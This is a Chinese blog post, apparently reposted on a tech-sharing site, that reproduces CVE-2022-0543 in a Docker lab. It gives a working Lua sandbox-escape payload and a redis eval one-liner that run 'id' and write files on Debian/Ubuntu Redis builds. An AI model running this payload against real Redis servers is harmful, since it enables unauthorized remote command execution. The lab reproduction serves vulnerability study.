标签：2022 0543 gnu Redis redis io CVE local id

CVE-2022-0543

漏洞介绍

Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值（Key-Value）存储数据库，并提供多种语言的API。Redis 存在代码注入漏洞，攻击者可利用该漏洞远程执行代码。
Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

搭建环境

docker-compose.yml

version: '2'
services:
 redis:
   image: vulhub/redis:5.0.7
   ports:
    - "50002:6379"

• image:表示要拉去的镜像

• ports:"映射到本地端口:容器内的端口"

启动环境

在docker-compose.yml文件对应目录中输入命令:

docker-compose up -d

漏洞复现

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数，即可获得io库，再使用其执行命令。

Lua是由C编写的，上面的话就是说我们可以直接调用一个变量然后操作io库进行任意执行。但是要实现CVE-2022--0543复现首先redis得有未授权访问漏洞或者我们已经通过一些手段进入了redis。

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

值得注意的是，不同环境下的liblua库路径不同，你需要指定一个正确的路径。在我们Vulhub环境（Ubuntu fiocal）中，这个路径是/usr/lib/x86_64-linux-gnu/liblua5.1.so.0。

连接redis，使用eval命令执行上述脚本：

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

这里我们下载一个redis客户端软件方便操作

redis默认有16个db随意选择一个即可

输入上面的poc，成功执行了id命令

第二次我们将io.oppen("id","r")中的id替换为echo 123>text.c 实现任意文件写入

在服务器中查看的结果

标签：2022,0543,gnu,Redis,redis,io,CVE,local,id
来源： https://www.cnblogs.com/beginnerzyh/p/16245456.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。